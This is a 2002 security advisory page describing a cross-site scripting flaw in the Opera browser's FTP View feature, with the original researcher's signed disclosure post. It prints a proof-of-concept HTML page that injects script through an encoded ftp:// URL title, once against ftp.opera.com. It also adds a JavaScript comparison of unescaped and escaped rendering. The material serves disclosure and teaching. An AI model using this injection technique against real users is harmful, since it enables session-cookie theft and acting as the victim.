SecurityTracker.com
Category:   Application (Web Browser)  >   Opera
Vendors:   Opera Software
Opera Web Browser Input Validation Flaw in FTP View Feature May Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1004962
SecurityTracker URL:  http://securitytracker.com/id/1004962
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 6 2002
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network

Version(s): 6.03, 6.04
Description:   An input validation vulnerability was reported in the Opera web browser. A remote user may be able to conduct cross-site scripting attacks in certain situations.

It is reported that Opera does not filter scripting code presented in the title bar in the FTP View feature. A remote user can create a specially crafted URL that, when loaded by a target user, may cause arbitrary scripting code to be executed by the target user's browser.

A demonstration exploit is provided:

<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

The code will appear to originate from the FTP server site and will run in the security context of that site. If the FTP server is also running an HTTP server, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the related web site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
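
The missing output escaping described above, shown beside a corrected form. This is an added example, not Opera's code or the advisory author's: the function names, the page template and the host ftp.example.test are assumptions, and the sample URL is constructed from the pattern in the demonstration above.

```javascript
// Added example: models a browser-generated FTP listing page whose <title>
// is built from the requested URL. All names here are hypothetical.

// Constructed sample input, following the advisory's URL pattern with a placeholder host.
const SAMPLE_URL =
  'ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.example.test/';

// Escape the characters that can change the HTML parsing context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Percent-decode a URL for display. A malformed sequence such as "%zz"
// makes decodeURIComponent throw, so fall back to the raw string.
function decodeForDisplay(url) {
  try {
    return decodeURIComponent(url);
  } catch (e) {
    return url;
  }
}

// Behaviour the advisory describes: the decoded URL goes into <title> unescaped,
// so markup carried in the userinfo part becomes part of the page.
function renderListingUnsafe(url) {
  return '<html><head><title>' + decodeForDisplay(url) +
         '</title></head><body></body></html>';
}

// Corrected form: decode first, then escape at the point of output.
function renderListingSafe(url) {
  return '<html><head><title>' + escapeHtml(decodeForDisplay(url)) +
         '</title></head><body></body></html>';
}

// Checks used to compare the two outputs.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
function countTitleClosers(html) {
  return (html.match(/<\/title>/gi) || []).length;
}

console.log('unsafe:', renderListingUnsafe(SAMPLE_URL));
console.log('safe:  ', renderListingSafe(SAMPLE_URL));
```

In the unsafe output the title element is closed early and a script element follows it; in the safe output the same text stays inside a single title element as character data.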

The vendor has reportedly been notified.

Impact:   A remote user may be able to access the target user's cookies (including authentication cookies), if any, associated with a target web site (if it is also running an FTP server), access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.opera.com/
Cause:   Input validation error
Underlying OS:  BeOS, Linux (Any), Apple (Legacy "classic" Mac), UNIX (Solaris - SunOS), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Opera FTP View Cross-Site Scripting Vulnerability


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Title:
~~~~~~~~~~~~~~~~~
Opera FTP View Cross-Site Scripting Vulnerability

 
Date:
~~~~~~~~~~~~~~~~~
4 August 2002

 
Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp]

 
Risk:
~~~~~~~~~~~~~~~~~
Medium

 
Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP2 Opera 6.03
Windows2000 SP2 Opera 6.04

 
Overview:
~~~~~~~~~~~~~~~~~
Opera allows running malicious scripts due to a bug in the 'FTP view' feature.
If you click on a malicious link, the script embedded in the URL will run.

 
Details:
~~~~~~~~~~~~~~~~~
This problem is in the 'FTP view' feature.
The '<title>URL</title>' is not escaped.

 
Exploit code:
~~~~~~~~~~~~~~~~~
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/">
</head>
<body>
<script>window.open("ftp://[FTPserver]/");</script>
</body>
</html>

Example:
<html>
<head>
<META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@ftp.opera.com/">
</head>
<body>
<script>window.open("ftp://ftp.opera.com/");</script>
</body>
</html>

 
Demonstration:
~~~~~~~~~~~~~~~~~
http://www.geocities.co.jp/SiliconValley/1667/advisory04e.html

 
Workaround:
~~~~~~~~~~~~~~~~~
Disable JavaScript.

 
Vendor status:
~~~~~~~~~~~~~~~~~
Opera Software ASA was notified on 30 June 2002.
 

- -------------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: zaddik@geocities.co.jp
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- -------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPU92oTnqpMRtMot1EQKN1gCcCsMtg6cAEBGMdfupW/WvmYIl+R0AoK1E
JiccWmvatZQwH9YV3FX8q1pv
=eHkj
-----END PGP SIGNATURE-----





 
 

